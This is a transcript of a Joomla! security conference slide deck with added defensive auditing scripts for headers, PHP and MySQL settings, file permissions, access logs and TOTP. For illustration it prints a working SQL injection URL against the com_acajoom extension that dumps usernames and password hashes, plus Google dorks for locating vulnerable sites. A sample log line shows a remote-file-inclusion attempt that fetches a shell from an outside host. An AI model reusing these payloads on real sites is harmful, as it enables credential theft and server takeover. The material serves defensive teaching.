Joomla! Security (JoomlaDay 2015)

By Shaiffulnizam Mohamad

"...Security is a moving target, so today's expert might be tomorrow's victim..."

Uploaded by shaiffulnizam-mohamad on 16-Apr-2017 (53 slides)

TRANSCRIPT

Page 1: Joomla! security jday2015

By Shaiffulnizam Mohamad

JOOMLA! SECURITY

...Security is a moving target, so today's expert might be tomorrow's victim...

Page 2: Joomla! security jday2015

Joomla! website hacked?

Page 3: Joomla! security jday2015

Definition of "Hacker"

• Someone who deliberately seeks to bypass a server's security
  • Black, grey and white hats
  • A hacked site is a broken/compromised site
• A skilled computer programmer
  • A hacked site is a tweaked and improved site
• A script kiddie
  • Junior hacker using other hackers' tools and techniques

Page 4: Joomla! security jday2015

Hacking motives?

• To see if they can
• To create mayhem
• For social standing in the sub-culture
• For political reasons – hacktivism
• For financial reasons
  • Theft – steal ebooks, videos, games, online services etc.
  • Sell data – user profiles, credit card details etc.
  • Industrial sabotage – paid to break competitor sites
  • Set up zombie farms
  • Steal bandwidth
  • Host phishing pages
  • Collect passwords

Page 5: Joomla! security jday2015

How do we know that we’ve been hacked?

• Site trashed

• Hacking message

• High bandwidth use

• Changed admin password

• New user with admin rights

• Server logs

Page 6: Joomla! security jday2015

Why do we care about computer security?

Page 7: Joomla! security jday2015

No ONE is SAFE!

Type of site          Motivation
--------------------  ----------------------------------------------------
Any site              To see if they can; to create mayhem; social standing;
                      post political messages; zombie farms; steal bandwidth;
                      host phishing pages
Any membership site   Sell user profiles to marketers; obtain usernames and
                      passwords
Some ecommerce sites  Sell credit card details to thieves; sell order history
                      and contact details to marketers

Page 8: Joomla! security jday2015

Why worry about being hacked?

• Sites are targeted at random
• Hacking is actually quite easy
  • Vulnerable sites are easy to find
  • Vulnerable sites are easy to hack
• Fixing hacked sites is quite tricky
  • Hacks can be invisible
  • Clients may not notice a hacked site for some time
  • Finding a clean backup may be impossible
  • Determining what has been done can be really hard
  • It may be difficult to restore
  • Hardening the site to avoid future hacks requires skill and focus

Page 9: Joomla! security jday2015

Why worry about being hacked?

Hacked sites are a big problem:

• Business reputation
• Angry clients
• Site shut down by the host
• Loss of business
• Data theft

Page 10: Joomla! security jday2015

Hacking Joomla! sites

Page 11: Joomla! security jday2015

Are Joomla! sites easy to hack?

• Yes and no
• Joomla! has to strike a balance between security and ease of use
• Joomla! is an attractive target for hackers
  • The critical mass of sites
  • Large amateur web developer user base
  • Extensions have variable security
• But the site must still be vulnerable: the attacker needs an exploitable flaw in the core, in an extension or on the server, and an up-to-date site with trusted, patched extensions does not offer one to the mass scans described next

Page 12: Joomla! security jday2015

How do they hack?

1. Find a vulnerability (and instructions on how to exploit it)
2. Find a vulnerable site
3. Hack the site

Page 13: Joomla! security jday2015

1st: finding a vulnerability

• Security sites
  • www.exploit-db.com, www.secunia.com
• Various hacking sites/forums
• Joomla! Vulnerable Extensions List
  • docs.joomla.org/Vulnerable_Extensions_List

The same public lists tell defenders which installed extensions need patching or removal, so check them before an attacker does.

Page 14: Joomla! security jday2015

2nd: find a vulnerable site

• Google Dork – a search phrase that returns sites exposing a known weakness
  • PHPInfo: intitle:phpinfo()
  • Vulnerable extensions: allinurl:com_acajoom

Page 15: Joomla! security jday2015

3rd: cut and paste code!

The published exploit for the vulnerable extension is a single URL; the attacker only substitutes the target host (redacted as xxxxxxxxxxxxxxxxx on the slide):

    http://xxxxxxxxxxxxxxxxx/index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,1,1,1,concat(username,0x3a,password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/from/**/jos_users/**/LIMIT/**/1,1/*

The mailingid value is concatenated straight into a SQL query, so the UNION SELECT appends a row read from the jos_users table; concat(username,0x3a,password) (0x3a is ':') puts "username:passwordhash" into a column the page then renders, and the /**/ comments stand in for spaces to slip past naive input filters.

Page 16: Joomla! security jday2015

Sometimes...

RFI = Remote File Inclusion: a vulnerable script includes a file from an attacker-supplied URL, so the attacker runs a web shell on the server and takes control of it.

Page 17: Joomla! security jday2015

What should we do to prevent it?

Joomla! security involves:

• Server operating system
• Server software
• PHP + MySQL
• Joomla! extensions
• Users and their behaviour

Page 18: Joomla! security jday2015

What should we do to prevent it?

Security action plan

1. Update your server operating system
2. Update your server software, e.g. Apache, Nginx, IIS, LiteSpeed etc.
3. Update your PHP and MySQL server
4. Secure your server

Page 19: Joomla! security jday2015

LEVELS OF SECURITY

The numbers in square brackets on the following slides mark how much server access an action needs:

[1] Basic actions
[2] More complex actions
[3] Actions that require significant modification rights on the server (unless already implemented by default)

Image by echiner1

What should we do to prevent it?

Page 20: Joomla! security jday2015

Joomla! Security
Server ~ shared, VPS and dedicated

• A shared server
  • Your site(s) live in the same hosting space as other sites that you do not administer
  • This is the cheapest hosting option
  • You have no say over the security of the other sites on the server
  • An old shared server is the worst location for your hosting
• A Virtual Private Server
  • Better than shared
  • You still can't change many settings

Page 21: Joomla! security jday2015

Joomla! Security
Server ~ shared, VPS and dedicated

• A dedicated server
  • Allows you to upgrade and tweak all the settings on the server
  • Depending on the plan (managed or unmanaged), the host may retain responsibility for maintenance; confirm who is expected to patch the operating system and the web stack

Page 22: Joomla! security jday2015

Joomla! Security
Server ~ Security

1. The underlying operating system must be updated
2. Update the web server, e.g. Apache, Nginx etc.
3. Update PHP and MySQL
4. Secure the above
5. Install additional security layers

Page 23: Joomla! security jday2015

Joomla! Security
Server ~ Security Hardening

1. Securing the Apache web server: adding response headers that make browsers mitigate XSS, clickjacking and MIME sniffing (mod_headers). These are browser-side mitigations, not a fix for the underlying flaws.

    <IfModule mod_headers.c>
        Header set X-XSS-Protection "1; mode=block"
        # Pre-standard header from early Firefox; current browsers only honour Content-Security-Policy.
        # The rest of this value is cut off on the original slide.
        Header set X-Content-Security-Policy "allow 'self'; options inline-script; img
        # 43200 s is only 12 hours; once HTTPS is known to work everywhere, raise max-age to months
        Header set Strict-Transport-Security "max-age=43200; includeSubDomains"
        # Applies to every response, including logged-in /administrator/ pages; scope it to static assets
        Header set Cache-Control "max-age=3600, public, must-revalidate"
        Header set X-Frame-Options "deny"
        Header set X-Content-Type-Options "nosniff"
        #Header set X-Content-Security-Policy "default-src 'self'"
        # Strips the PHP version banner; also set expose_php = Off so PHP stops adding it
        Header unset X-Powered-By
        Header unset X-Pingback
    </IfModule>

2. Hide the server signature (ServerTokens Prod and ServerSignature Off in the Apache configuration), so the Server header and error pages stop announcing the exact Apache version
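A quick way to confirm that the block above actually took effect is to audit the headers a response carries. The following is an added example, not code from the slides or from Joomla!: it checks one response's headers against the list above and also flags the two values the slide gets slightly wrong (a 12-hour HSTS lifetime and a site-wide public Cache-Control), plus the version-leaking Server header that ServerTokens Prod is meant to remove. X-XSS-Protection is deliberately not required, because current browsers have dropped the XSS auditor it controlled. The two header sets at the bottom are constructed samples, and the 180-day HSTS threshold is this example's assumption.

```python
"""Audit HTTP response headers against the Apache hardening slide (added example)."""
import re

# Assumed minimum HSTS lifetime once HTTPS is known to work everywhere: 180 days.
HSTS_MIN_SECONDS = 180 * 24 * 3600

REQUIRED = {
    "x-frame-options": ("deny", "sameorigin"),
    "x-content-type-options": ("nosniff",),
}
# Headers that only tell a scanner what software is running.
DISCLOSURE = ("x-powered-by", "x-pingback", "x-generator")


def _lower(headers):
    return {k.lower(): v.strip() for k, v in headers.items()}


def audit_headers(headers, https=True):
    """Return a list of findings for one response; an empty list means clean."""
    h = _lower(headers)
    findings = []

    for name, allowed in REQUIRED.items():
        value = h.get(name)
        if value is None:
            findings.append(f"missing {name}")
        elif value.lower() not in allowed:
            findings.append(f"{name} has unexpected value {value!r}")

    # HSTS only means anything over HTTPS; it must be present and long enough to matter.
    if https:
        hsts = h.get("strict-transport-security")
        if hsts is None:
            findings.append("missing strict-transport-security")
        else:
            m = re.search(r"max-age=(\d+)", hsts)
            if not m or int(m.group(1)) < HSTS_MIN_SECONDS:
                findings.append(f"strict-transport-security max-age too short: {hsts!r}")

    # The pre-standard X-Content-Security-Policy header is ignored by current browsers.
    if "content-security-policy" not in h:
        if "x-content-security-policy" in h:
            findings.append("only legacy x-content-security-policy set; browsers need content-security-policy")
        else:
            findings.append("missing content-security-policy")

    for name in DISCLOSURE:
        if name in h:
            findings.append(f"disclosure header present: {name}={h[name]!r}")
    server = h.get("server", "")
    if re.search(r"\d", server):  # "Apache/2.4.7 (Ubuntu)" hands the scanner the version
        findings.append(f"server header leaks version: {server!r}")

    # A public, cacheable default also applies to /administrator/ responses.
    cc = h.get("cache-control", "").lower()
    if "public" in cc and "private" not in cc:
        findings.append("cache-control is public site-wide; scope it to static assets")

    return findings


# Constructed sample: roughly what the slide's <IfModule> block emits on a stock Apache.
SLIDE_HEADERS = {
    "Server": "Apache/2.4.7 (Ubuntu)",
    "X-XSS-Protection": "1; mode=block",
    "X-Content-Security-Policy": "allow 'self'",
    "Strict-Transport-Security": "max-age=43200; includeSubDomains",
    "Cache-Control": "max-age=3600, public, must-revalidate",
    "X-Frame-Options": "deny",
    "X-Content-Type-Options": "nosniff",
}

# Constructed sample: the same server after the fixes suggested in the comments above.
HARDENED_HEADERS = {
    "Server": "Apache",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Content-Security-Policy": "default-src 'self'",
    "X-Frame-Options": "DENY",
    "X-Content-Type-Options": "nosniff",
    "Cache-Control": "no-store",
}

if __name__ == "__main__":
    for label, hdrs in (("slide", SLIDE_HEADERS), ("hardened", HARDENED_HEADERS)):
        print(label, audit_headers(hdrs) or ["clean"])
```

Feed it the headers from a real response (for example from a `curl -sI` of the home page and of /administrator/) and treat every finding as a configuration change to make; the hardened sample shows a header set that passes.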

Page 24: Joomla! security jday2015

Joomla! Security
Server ~ Security Hardening

3. Activating .htaccess overrides in the Apache configuration (AllowOverride), then using .htaccess files:
  • [1] Activate the htaccess.txt shipped in the Joomla! root by renaming it to .htaccess
  • [1] Use .htpasswd protection for the /administrator/ folder
  • [3] Advanced .htaccess files

Page 25: Joomla! security jday2015

Joomla! Security
Server ~ Security Hardening

1. Hardening PHP with Suhosin (a PHP 5 extension; there is no maintained release for PHP 7 and later)
2. Use PHP disable_functions to block the functions a dropped web shell relies on to run commands: show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open. A blacklist of this kind slows an intruder down but is not a sandbox.
3. Do not expose the PHP version: expose_php = Off
4. Use open_basedir to restrict the file-handling functions to the site's own directory tree

Page 26: Joomla! security jday2015

Joomla! Security
Server ~ Security Hardening

• Globally reset all files
  • Owner – AccountUsername:AccountUsername

    # run from the Joomla! root; "." rather than "*" also covers dotfiles such as .htaccess
    chown -R user:group .

  • Files – 644

    find . -type f -exec chmod 644 {} \;

  • Folders – 755

    find . -type d -exec chmod 755 {} \;

• Use suPHP: PHP files run under the user of the website instead of the Apache user, so a compromised site cannot write into its neighbours on a shared server

Page 27: Joomla! security jday2015

Joomla! Security
Server ~ Security Hardening

1. Hardening the MySQL server
2. Disable access from outside (allow local connections only, e.g. bind-address = 127.0.0.1)
3. Make sure the root account has a password; after setup, run the mysql_secure_installation command (it sets the root password, removes anonymous users and the test database, and disables remote root login)
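The PHP and MySQL slides above both boil down to a handful of ini directives, so the check a practitioner wants is one that reads php.ini and my.cnf and reports what is missing or too permissive. The following is an added example, not from the slides: it parses both files with the standard configparser and applies the rules from the two slides (expose_php off, the listed functions disabled, open_basedir set, MySQL bound to a local address or networking skipped). The four file contents are constructed samples, not a real server's configuration.

```python
"""Audit php.ini and my.cnf directives from the PHP and MySQL hardening slides (added example)."""
import configparser

# Functions the PHP slide wants disabled: everything a web shell needs to run commands.
WANT_DISABLED = {"show_source", "system", "shell_exec", "passthru", "exec", "phpinfo", "popen", "proc_open"}
LOCAL_ADDRESSES = {"127.0.0.1", "localhost", "::1"}


def _parse(text):
    """php.ini and my.cnf are both ini files; a leading [DEFAULT] absorbs sectionless lines."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, allow_no_value=True)
    cp.optionxform = str  # keep directive names exactly as written
    cp.read_string("[DEFAULT]\n" + text)
    return cp


def _is_off(value):
    return value.strip().strip('"').lower() in {"off", "0", "false", ""}


def audit_php_ini(text):
    cp = _parse(text)
    php = cp["PHP"] if cp.has_section("PHP") else cp["DEFAULT"]
    findings = []

    if not _is_off(php.get("expose_php", "On")):
        findings.append("expose_php is On: the PHP version is sent in X-Powered-By")

    disabled = {f.strip() for f in php.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(WANT_DISABLED - disabled)
    if missing:
        findings.append("disable_functions does not cover: " + ", ".join(missing))

    if not php.get("open_basedir", "").strip().strip('"'):
        findings.append("open_basedir unset: PHP may open any file the web user can read")
    return findings


def audit_my_cnf(text):
    cp = _parse(text)
    mysqld = cp["mysqld"] if cp.has_section("mysqld") else cp["DEFAULT"]
    if "skip-networking" in mysqld:  # TCP disabled entirely; only the local socket is left
        return []
    bind = mysqld.get("bind-address", "") or ""
    if bind.strip() not in LOCAL_ADDRESSES:
        shown = bind.strip() or "(unset, listens on all interfaces)"
        return [f"bind-address={shown}: MySQL is reachable from outside the host"]
    return []


# Constructed samples: a default-ish install and the hardened version of the same files.
WEAK_PHP_INI = """\
[PHP]
expose_php = On
disable_functions =
; open_basedir is not set
"""
HARDENED_PHP_INI = """\
[PHP]
expose_php = Off
disable_functions = show_source,system,shell_exec,passthru,exec,phpinfo,popen,proc_open
open_basedir = "/var/www/example.com:/tmp"
"""
WEAK_MY_CNF = """\
[mysqld]
bind-address = 0.0.0.0
"""
HARDENED_MY_CNF = """\
[mysqld]
bind-address = 127.0.0.1
"""

if __name__ == "__main__":
    print("php.ini (weak):", audit_php_ini(WEAK_PHP_INI))
    print("php.ini (hardened):", audit_php_ini(HARDENED_PHP_INI))
    print("my.cnf (weak):", audit_my_cnf(WEAK_MY_CNF))
    print("my.cnf (hardened):", audit_my_cnf(HARDENED_MY_CNF))
```

Run it against the real files (`php --ini` shows which php.ini is loaded; remember that a per-site php.ini or .user.ini can override the global one) and fix each finding before trusting the slide's checklist as done.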

Page 28: Joomla! security jday2015

Joomla! Security
Server ~ Additional Security Hardening

1. Add an additional firewall, e.g. CSF (ConfigServer Security & Firewall)
2. Add ModSecurity, a web application firewall module for Apache that helps protect your website from various attacks. It blocks commonly known exploits by matching requests against regular expressions and rule sets (e.g. the OWASP Core Rule Set)
3. Install a malware detector such as maldet (Linux Malware Detect)
4. Install a rootkit detector
5. Install fail2ban (bans source IPs after repeated failed logins seen in the logs) and an IDS (intrusion detection system)

Page 29: Joomla! security jday2015

Joomla! Security
Use a CDN for security

1. Absorb DDoS traffic before it reaches the origin
2. Filter attackers' requests with the CDN's firewall rules
3. Shield the origin server from direct attack

A CDN in front of the site hides the origin address and filters known attack patterns, but it does not patch the site behind it: a vulnerable extension is still vulnerable to any request that gets through.

Page 33: Joomla! security jday2015

Joomla! Security Checklist
https://docs.joomla.org/Security

Page 34: Joomla! security jday2015

Joomla! Security Checklist
https://docs.joomla.org/Security

Install official versions of Joomla!
http://www.joomla.org/download.html

Upgrade to the latest stable version of Joomla! as soon as possible.

Download Joomla! from official sites only, such as JoomlaCode.org, and check the MD5 hash against the one published there (this catches a corrupted or swapped download, but only if the hash itself comes from the official site).

Use web page diagnostic tools, i.e. Firefox Firebug, IE Web Developer Toolbar, Opera Dragonfly etc., to ensure that all files were installed correctly.

Install official updates from Joomla!
To avoid breaking your site, search the forums for reports of incompatible extensions before upgrading to a new version of Joomla!.

Page 35: Joomla! security jday2015

Joomla! Security Checklist
https://docs.joomla.org/Security

Default administrator username
Change the user name of the default admin user. This simple step removes one of the two things an attacker must know (username and password) to gain access, so brute-force tools can no longer assume the account is called "admin".

Administrator passwords
Never use easy-to-guess passwords, e.g. admin123, password, 123456. Use a mix of upper- and lower-case letters, digits and special characters, e.g. F1$hn3Tw0Rk, and use more than 8 characters; longer is better, and a password manager makes 16 or more random characters practical.

Page 36: Joomla! security jday2015

Joomla! Security Checklist
https://docs.joomla.org/Security

Limit Super Users
Fewer Super Users means fewer accounts whose compromise hands over the whole site, and fewer problems.

Disable registration if you are not running a social site, or if your website is limited to your employees.

Page 37: Joomla! security jday2015

Joomla! Security Checklist
https://docs.joomla.org/Security

Protecting directories and files
Only the configurable paths Joomla! must write to (the temporary and log folders, the cache) need to be writable by the web server. Never use chmod 777; chmod 755 is sufficient for directories and 644 for files. Use .htaccess to stop upload directories such as images and download from running PHP files:

    # secure directory by disabling script execution
    # (goes in the .htaccess of the upload folder: map the extensions to the CGI handler,
    # then refuse to execute CGI, so a request for an uploaded .php returns 403 instead of
    # running it; needs AllowOverride FileInfo Options for that directory)
    AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
    Options -ExecCGI
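The permission rules from the chown/chmod slide and the "no scripts in upload folders" rule above are easy to state and easy to break again with one careless FTP upload, so they deserve a repeatable check. The following is an added example, not from the slides: it walks a site root and reports every file or directory that is not 644/755, anything world-writable (the chmod 777 the slide warns against), symlinks, and script files under upload folders, then applies the slide's two find/chmod commands in Python. The tree it scans is constructed in a temporary directory with a deliberately dropped images/stories/shell.php; the list of upload folders and script extensions is this example's assumption.

```python
"""Audit file modes and upload folders of a Joomla! tree (added example)."""
import os
import stat
import tempfile

FILE_MODE, DIR_MODE = 0o644, 0o755
UPLOAD_DIRS = ("images", "media", "tmp", "cache")  # assumed writable/upload folders
SCRIPT_SUFFIXES = (".php", ".phtml", ".php5", ".phar")


def audit_tree(root):
    """Return sorted findings for everything under root, as paths relative to root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        entries = [(d, True) for d in dirnames] + [(f, False) for f in filenames]
        for name, is_dir in entries:
            path = os.path.join(dirpath, name)
            rel = os.path.normpath(os.path.join(rel_dir, name))
            if os.path.islink(path):
                findings.append(f"{rel}: symlink (check where it points)")
                continue
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            expected = DIR_MODE if is_dir else FILE_MODE
            if mode & stat.S_IWOTH:
                findings.append(f"{rel}: world-writable ({mode:o})")
            elif mode != expected:
                findings.append(f"{rel}: mode {mode:o}, expected {expected:o}")
            top = rel.split(os.sep)[0]
            if not is_dir and top in UPLOAD_DIRS and name.lower().endswith(SCRIPT_SUFFIXES):
                findings.append(f"{rel}: script in upload folder")
    return sorted(findings)


def fix_modes(root):
    """The slide's two find/chmod commands: 755 for directories, 644 for files."""
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            os.chmod(os.path.join(dirpath, d), DIR_MODE)
        for f in filenames:
            os.chmod(os.path.join(dirpath, f), FILE_MODE)


def build_sample_site():
    """Constructed sample tree showing the mistakes the slides describe."""
    root = tempfile.mkdtemp(prefix="joomla-")
    os.makedirs(os.path.join(root, "images", "stories"))
    os.makedirs(os.path.join(root, "administrator"))
    files = {
        "configuration.php": "<?php class JConfig {}\n",
        os.path.join("images", "stories", "shell.php"): "<?php // dropped by an attacker\n",
        os.path.join("administrator", "index.php"): "<?php\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
        os.chmod(os.path.join(root, rel), FILE_MODE)
    for rel in ("administrator", os.path.join("images", "stories")):
        os.chmod(os.path.join(root, rel), DIR_MODE)
    os.chmod(os.path.join(root, "images"), 0o777)             # the classic "make uploads work" mistake
    os.chmod(os.path.join(root, "configuration.php"), 0o666)  # database credentials, world-writable
    return root


def demo():
    """Audit the sample, apply the slide's chmod rules, audit again."""
    root = build_sample_site()
    before = audit_tree(root)
    fix_modes(root)
    return before, audit_tree(root)


if __name__ == "__main__":
    before, after = demo()
    print("before:", *before, sep="\n  ")
    print("after chmod:", *after, sep="\n  ")
```

Note what the second audit still reports: chmod fixes the modes but cannot remove the web shell in images/stories, which is why the .htaccess rule above (or a file-integrity check) is needed on top of correct permissions.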

Page 38: Joomla! security jday2015

Joomla! Security Checklist
https://docs.joomla.org/Security

Remove all unneeded files and extensions
All unneeded and unused files and extensions must be removed.

In general, do not leave any unneeded files (compressed or otherwise) on a public server. Each unused (and perhaps long forgotten) file is a potential security hole, because it is still reachable by URL but no longer receives updates.

Page 39: Joomla! security jday2015

Joomla! Security Checklist
https://docs.joomla.org/Security

Installing Joomla! extensions

1. Always back up first
2. Check for extension vulnerabilities (the Vulnerable Extensions List)
3. Download from a trusted site
4. Check the code quality of the extension
5. Test on a development site
6. Remove junk (installation packages, sample files, extensions you no longer use)
7. Avoid encrypted or obfuscated code, which you cannot review

Page 40: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

[1] SEF all URLs
[2] Clear the default Joomla! meta tags
[3] Clear the default home page title
[4] Remove the generator tag
[5] Change the favicon
[6] Hide component credits

The less information a site reveals about Joomla! and its extensions, the harder it is to find with the dorks and version scanners described earlier. This only hides the fingerprint; it fixes nothing, so it complements patching rather than replacing it.

Page 41: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

Implement two-factor authentication

Two-factor authentication is a login method whereby a person has to provide his/her user name, password and a randomly generated OTP (one-time password).

The OTP is a six-digit numeric code computed from a shared secret and the current time (TOTP, RFC 6238); each code is valid only for a short interval, typically 30 seconds. Even if a hacker guesses your Joomla! administrator username and password correctly, they would still require the OTP to log in.

Enabling two-factor authentication requires Joomla! 3.2.0 or higher:
1. Log in to the administration area.
2. Click Components >> Post-installation Messages.
3. Click Enable two-factor authentication.
4. Install a Google Authenticator compatible client on your device.
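To see why the OTP is worth the extra step, it helps to see how small the algorithm is. The following is an added example, not Joomla!'s own code: Joomla!'s Google Authenticator plugin implements the same TOTP algorithm, but this is an independent stand-alone version using only the standard library. The shared secret is the RFC 6238 test vector ("12345678901234567890", written in the base32 form an authenticator app would scan) and the timestamps are the RFC's test times, not a real login; the one-step verification window is this example's choice.

```python
"""Generate and verify the six-digit OTP of the two-factor slide: TOTP, RFC 6238 (added example)."""
import base64
import hashlib
import hmac
import struct
import time

STEP_SECONDS = 30
DIGITS = 6


def totp(secret_b32, at_time, step=STEP_SECONDS, digits=DIGITS):
    """HOTP(K, floor(T / step)) with dynamic truncation, as in RFC 4226 / RFC 6238."""
    key = base64.b32decode(secret_b32.upper().replace(" ", ""), casefold=True)
    counter = struct.pack(">Q", int(at_time) // step)       # 8-byte big-endian step counter
    digest = hmac.new(key, counter, hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                               # dynamic truncation: low nibble picks 4 bytes
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"


def verify_totp(secret_b32, submitted, at_time=None, window=1):
    """Accept the code for the current step and `window` steps either side, for clock drift.

    The comparison is constant-time so response timing does not reveal how many digits matched.
    """
    at_time = time.time() if at_time is None else at_time
    for k in range(-window, window + 1):
        candidate = totp(secret_b32, at_time + k * STEP_SECONDS)
        if hmac.compare_digest(candidate, str(submitted)):
            return True
    return False


# RFC 6238 SHA-1 test secret ("12345678901234567890"), base32-encoded as an authenticator app stores it.
RFC6238_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"

if __name__ == "__main__":
    for t in (59, 1111111109, 1234567890, 2000000000):
        print(t, totp(RFC6238_SECRET_B32, t))
    print("now:", totp(RFC6238_SECRET_B32, time.time()))
```

The password an attacker guessed or phished tells them nothing about the next code, because the code depends on a secret that never leaves the phone and the server's database; conversely, this is why the server must protect its stored TOTP secrets as carefully as password hashes, and why server clock drift of more than one step breaks logins.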

Page 42: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

Spam bots try to inject spam content onto your site, targeting Joomla! core forms and extension forms (registration, contact, comments).

Use a CAPTCHA to fight automated spammers.

Page 43: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

Use security extensions

Page 44: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

Disable the FTP layer in Joomla!'s Global Configuration

• If a hacker can obtain your FTP password, they can log in as you, bypassing almost every security barrier.
• FTP passwords are stored unencrypted in your FTP program!
• FTP authentication details pass unencrypted to the server!
• Several common FTP apps store their passwords in a standard location with a standard name, so malware on your PC knows exactly where to look!
• When you do need to transfer files, use SFTP or SCP over SSH instead of plain FTP.

Page 45: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

Change the temporary folder and logs path: move them outside the web root so their contents cannot be fetched by URL.

Page 46: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

Make sure to check for Joomla! and extension updates regularly; the administrator's update components show both.

Page 47: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

Preparing for the worst
Are you ready?

Page 48: Joomla! security jday2015

Joomla! Security
How to secure Joomla!

Preparing for the worst
1. Site monitoring
2. Joomla! site backups
3. Restoring a hacked site

Page 49: Joomla! security jday2015

Joomla! Security
Site monitoring

• Diagnostics
  • Site down
  • Home page content changes
  • mod_security logs (show attempts)
  • Bandwidth use
  • Spam blacklisting
• [3] Searching and browsing server logs
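Searching the server logs is where the earlier "how they hack" slides and this monitoring slide meet: the dork, the UNION SELECT URL and the RFI attempt all leave a line in the access log. The following is an added example, not from the slides: it parses Apache combined-format lines, percent-decodes each request URL and collapses the /**/ comments from the exploit URL, then matches signatures for UNION-based SQL injection against jos_users, phpinfo exposure, remote file inclusion (a URL passed as a parameter value) and the com_acajoom name the dork searched for; it also counts POSTs to the administrator login per client IP, which is the signal fail2ban acts on. The log lines are constructed samples using 203.0.113.x documentation addresses, the com_foo component in the RFI line is a placeholder, and the five-request brute-force threshold is this example's assumption.

```python
"""Scan Apache access-log lines for the attacks described in this deck (added example)."""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache combined log format: ip ident user [time] "METHOD url PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Applied to the URL after decoding and comment-collapsing, so the evasions on the exploit URL do not help.
SIGNATURES = {
    "sqli-union": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I),
    "sqli-users": re.compile(r"\bfrom\b\s*jos_users\b|\bconcat\s*\(\s*username", re.I),
    "phpinfo":    re.compile(r"phpinfo\.php|phpinfo\(\)", re.I),
    "rfi":        re.compile(r"[?&]\w+=(?:https?|ftp)://", re.I),
    "vuln-ext":   re.compile(r"option=com_acajoom", re.I),
}
ADMIN_LOGIN_RE = re.compile(r"^/administrator/index\.php")
BRUTE_FORCE_THRESHOLD = 5  # assumed: this many admin login POSTs from one IP in the sample window


def normalise(url):
    """Undo the encodings an attacker uses so the signatures see plain SQL."""
    u = unquote_plus(unquote_plus(url))   # second pass catches double encoding
    return re.sub(r"/\*.*?\*/", " ", u)   # /**/ used in place of spaces


def scan(lines):
    """Return (hits, brute_force): hits is a list of (ip, tag, raw_url); brute_force maps ip -> count."""
    hits, admin_posts = [], Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, url = m["ip"], m["method"], m["url"]
        decoded = normalise(url)
        for tag, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                hits.append((ip, tag, url))
        if method == "POST" and ADMIN_LOGIN_RE.match(url):
            admin_posts[ip] += 1
    brute_force = {ip: n for ip, n in admin_posts.items() if n >= BRUTE_FORCE_THRESHOLD}
    return hits, brute_force


# Constructed sample log: one normal visitor, the deck's exploit URL, an encoded injection,
# a phpinfo probe, an RFI attempt against a placeholder component, and a login brute force.
SAMPLE_LOG = [
    '203.0.113.10 - - [14/Jun/2015:10:00:01 +0800] "GET /index.php?option=com_content&view=article&id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [14/Jun/2015:10:00:05 +0800] "GET /index.php?option=com_acajoom&act=mailing&task=view&listid=1&Itemid=1&mailingid=1/**/union/**/select/**/1,concat(username,0x3a,password),1/**/from/**/jos_users/* HTTP/1.1" 200 8192 "-" "Mozilla/5.0"',
    '203.0.113.21 - - [14/Jun/2015:10:01:00 +0800] "GET /index.php?id=1%20UNION%20SELECT%201,2,3 HTTP/1.1" 200 3000 "-" "sqlmap/1.0"',
    '203.0.113.22 - - [14/Jun/2015:10:02:00 +0800] "GET /phpinfo.php HTTP/1.1" 200 40000 "-" "-"',
    '203.0.113.23 - - [14/Jun/2015:10:03:00 +0800] "GET /index.php?option=com_foo&controller=http://203.0.113.99/shell.txt? HTTP/1.1" 500 0 "-" "-"',
] + [
    f'203.0.113.30 - - [14/Jun/2015:10:05:{i:02d} +0800] "POST /administrator/index.php HTTP/1.1" 303 0 "-" "Mozilla/5.0"'
    for i in range(6)
]

if __name__ == "__main__":
    hits, brute = scan(SAMPLE_LOG)
    for ip, tag, url in hits:
        print(f"{ip:14} {tag:10} {url[:80]}")
    print("brute force:", brute)
```

A 200 status on the injection line is the worrying case: the request succeeded, so the next step is to check whether jos_users data left the server and to rotate the affected password hashes. Signatures like these are what ModSecurity rule sets encode; running them over the historical log tells you whether the attempts predate the rules.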

Page 50: Joomla! security jday2015

Joomla! Security
Joomla! Backup

• Why back up?
• When should I back up my Joomla! site?
• How often should I back up my Joomla! site?
• How to back up?

Page 51: Joomla! security jday2015

Joomla! Security
Joomla! Backup

How to back up?
1. Manual backup through the command line (the database via mysqldump, the files via tar)
2. Using extensions such as Akeeba Backup, EJB and XCloner

What to back up?
1. All files (including configuration.php)
2. Images or documents uploaded by users
3. The database

REMEMBER TO TEST YOUR BACKUP: an archive you have never restored is a hope, not a backup.
